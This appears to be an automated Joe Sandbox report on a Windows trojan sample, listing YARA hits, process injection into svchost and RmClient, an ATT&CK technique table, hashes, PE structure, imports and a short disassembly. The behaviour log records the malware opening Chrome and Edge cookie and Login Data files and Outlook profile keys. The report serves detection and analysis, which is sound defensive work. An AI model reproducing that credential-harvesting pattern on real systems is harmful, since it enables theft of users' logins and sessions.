            Source: Yara match, File source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RmClient.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 412 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            [Behavior graph] Behavior Graph ID: 1529888, Sample: w64HYOhfv1.exe, Startdate: 09/10/2024, Architecture: WINDOWS, Score: 100. Process chain: w64HYOhfv1.exe -> svchost.exe (started) -> ifhdPMDeORMlb.exe (injected) -> RmClient.exe (started) -> ifhdPMDeORMlb.exe (injected) and firefox.exe (started).

            Source | Detection | Scanner | Label | Link
            w64HYOhfv1.exe | 55% | ReversingLabs | Win32.Worm.DorkBot |
            w64HYOhfv1.exe | 100% | Avira | HEUR/AGEN.1321671 |
            w64HYOhfv1.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1529888
                                                                                                                    Start date and time:2024-10-09 14:17:34 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 9m 42s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:w64HYOhfv1.exe
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:67910182eeeb3ac668faa832fbadfbe41f239b03da3e05a4ed36ea9a65da3d5c.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@17/11
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 80%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 87%
                                                                                                                    • Number of executed functions: 35
                                                                                                                    • Number of non-executed functions: 313
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • VT rate limit hit for: w64HYOhfv1.exe
Time | Type | Description
08:19:30 | API Interceptor | 10270085x Sleep call for process: RmClient.exe modified
                                                                                                                    Process:C:\Windows\SysWOW64\RmClient.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Process:C:\Users\user\Desktop\w64HYOhfv1.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):287232
                                                                                                                    Entropy (8bit):7.995735291117642
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:2DvtJEz7JGAUT3QWF3UWB/tev8L/+F447YmUB+PNttELrlDT8tmaTZOvyLd7DQ:MXEzltUkWUWBw8j+F4tmAg6omAZkyBDQ
                                                                                                                    MD5:78D8B05247C78674DA5C54B4C58DC87E
                                                                                                                    SHA1:F03F14DEE05F0812C9A57461F9A01EDDDA61656D
                                                                                                                    SHA-256:468B693B0581E2C63A562FA804320AE5605F55D3068E735B214658F1EC40E86E
                                                                                                                    SHA-512:09B756D2BA97CBBE868E937BFA5F8DC7C4C6A143F82ACF9CB1000E817EA71942A574B325D9BF2FF126CD703067966FA0639CC666D9100FA462969067B0CDB0C7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.541953965256774
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:w64HYOhfv1.exe
                                                                                                                    File size:1'363'343 bytes
                                                                                                                    MD5:ac184c685020ceff107e43cabba13b4f
                                                                                                                    SHA1:220f62ae6c76b24985cc3dbf558022fc8ca65c29
                                                                                                                    SHA256:67910182eeeb3ac668faa832fbadfbe41f239b03da3e05a4ed36ea9a65da3d5c
                                                                                                                    SHA512:0e1562ced6e2e06c04d257132587a54b44e44fa5925750ff62d13c711b988301d9096a62b7833b61937cc7c89762aaa61607150ae149a925691526ead6419759
                                                                                                                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCIk/xzTqP+9eSJ/eosXn6uqtGOzVL5:7JZoQrbTFZY1iaCB3eO2osX6u8GOzVt
                                                                                                                    TLSH:B355E122F5C69036C2B323B19E7EF766963D79371326D19B27C81E325EA04416B39723
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                    Icon Hash:1733312925935517
                                                                                                                    Entrypoint:0x4165c1
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                    Instruction
                                                                                                                    call 00007FE4F4AD9C3Bh
                                                                                                                    jmp 00007FE4F4AD0AAEh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                                                                    mov ecx, dword ptr [ebp+10h]
                                                                                                                    mov edi, dword ptr [ebp+08h]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007FE4F4AD0C2Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007FE4F4AD0DC6h
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007FE4F4AD0C3Eh
                                                                                                                    cmp dword ptr [004A9724h], 00000000h
                                                                                                                    je 00007FE4F4AD0C35h
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    and edi, 0Fh
                                                                                                                    and esi, 0Fh
                                                                                                                    cmp edi, esi
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    jne 00007FE4F4AD0C27h
                                                                                                                    jmp 00007FE4F4AD1002h
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007FE4F4AD0C36h
                                                                                                                    shr ecx, 02h
                                                                                                                    and edx, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FE4F4AD0C4Bh
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00416740h+edx*4]
                                                                                                                    mov eax, edi
                                                                                                                    mov edx, 00000003h
                                                                                                                    sub ecx, 04h
                                                                                                                    jc 00007FE4F4AD0C2Eh
                                                                                                                    and eax, 03h
                                                                                                                    add ecx, eax
                                                                                                                    jmp dword ptr [00416654h+eax*4]
                                                                                                                    jmp dword ptr [00416750h+ecx*4]
                                                                                                                    nop
                                                                                                                    jmp dword ptr [004166D4h+ecx*4]
                                                                                                                    nop
                                                                                                                    inc cx
                                                                                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                    inc cx
                                                                                                                    add byte ptr [ebx], ah
                                                                                                                    ror dword ptr [edx-75F877FAh], 1
                                                                                                                    inc esi
                                                                                                                    add dword ptr [eax+468A0147h], ecx
                                                                                                                    add al, cl
                                                                                                                    jmp 00007FE4F6F49427h
                                                                                                                    add esi, 03h
                                                                                                                    add edi, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FE4F4AD0BEEh
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00000000h+edx*4]
                                                                                                                    Programming Language:
                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                    • [C++] VS2010 SP1 build 40219
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2010 SP1 build 40219
                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                    • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, 
CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, 
OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
